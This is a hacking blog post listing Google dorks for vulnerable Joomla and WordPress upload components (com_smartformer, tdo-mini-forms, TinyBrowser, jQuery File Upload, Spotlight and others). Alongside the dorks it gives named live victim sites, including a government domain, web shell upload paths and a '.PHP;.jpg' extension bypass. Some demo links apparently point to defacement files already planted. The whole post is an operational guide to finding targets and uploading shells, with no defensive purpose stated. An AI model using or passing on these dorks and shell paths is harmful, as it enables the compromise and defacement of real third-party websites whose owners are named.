
Exploit Tamper Data (Includes Joomla and WordPress)




Thama Blog - Hi, this time I will share a few dorks for exploiting Joomla as well as WordPress. OK, without further ado, let's get straight to it.



1. Joomla Component com_smartformer
[ dork ]
inurl:index.php?option=com_smartformer  inurl:itemid= intext:Upload
[ demo ]
http://www.goodarch2u.com.my/index.php?option=com_smartformer&Itemid=439&lang=en
http://www.finenge.com/en/index.php?option=com_smartformer&Itemid=90
[ shell location ]
site/components/com_smartformer/files/yournameshell.php
[ details ]
http://1337day.com/exploit/19825

2. WordPress Plugin Zarzadzanie Kontem (Ajax File Manager)
[ dork ]
inurl:"ajaxfilemanager.php?page=" intitle:ajax file manager
[ demo ]
http://www.madiunkab.go.id/qwerty/filemanager/ajaxfilemanager.php?page=3
http://www.hacker-motor.com/javascript/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=5

3. WP Plugin "tdo-mini-form"
[ dork ]
inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload
[ link upload file ]
site/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP;.jpg
[ example ]
wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP;.jpg
[ demo ]
http://www.tutufoundationusa.org/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
[ details ]
http://1337day.com/exploit/19776 

4. jQuery File Upload
[ dork ]
intitle:upload intext:Add files.. "Start upload" Cancel upload Delete
[ vuln ]
http://konceptsigngroup.com/jQuery-FileUpload/index.html
[ demo ]
http://konceptsigngroup.com/jQuery-FileUpload/server/php/thumbnails/anonymous%20muslim.jpg 

5. Upload Tiny Browser
[ new dork ]
inurl:tinybrowser/upload.php
intitle:Index of / intext:Parent Directory "tinybrowser/"
inurl:/tinybrowser/ intitle:TinyBrowser :: ext:php
inurl:tinybrowser/upload.php intext:Enviar Arquivos intitle:TinyBrowser :: Upload
inurl:type=image& intext:Enviar Arquivos intitle:TinyBrowser :: Upload
[ demo ]
http://www.maspa.com.br/clientes/lj/admin/js/tiny_mce/plugins/tinybrowser/upload.php
[ example ]
http://www.maspa.com.br/uploads/images/_thumbs/_anonymous_muslims.jpg
[ details ]
http://1337day.com/exploit/19732

6. Joomla File Upload "com_autostand"
[ dork ]
inurl:index.php?option=** func=newItem intext:Select Image Add a Car
inurl:index.php?option=** func=newItem intext:Select Image Publish Only available to admin
inurl:index.php?option=com_autostand
[ poc ]
site/inurl:index.php?option=com_autostand&func=newItem
[ demo ]
http://www.karahan.be//index.php?option=com_autostand&func=newItem   


TAMPER DATA & SHELL UPLOAD 

1. Plugin Spot Light
[ dork ]
intitle:index of /../plugins/spotlightyour/monetize/ intext:Parent Directory "upload/"
inurl:wp-content monetize/upload/ intext:Uploading Please wait ... Uploaded Successfully.
inurl:wp-content/plugins/spotlightyour/
[ exploit ]
http://site/wp-content/plugins/spotlightyour/monetize/upload/
[ shell access ]
wp-content/uploads/[year]/[month]/[search your shell].php
[ example ]
http://pure-cashmere-pashmina-scarves.com/wp-content/plugins/spotlightyour/monetize/upload/
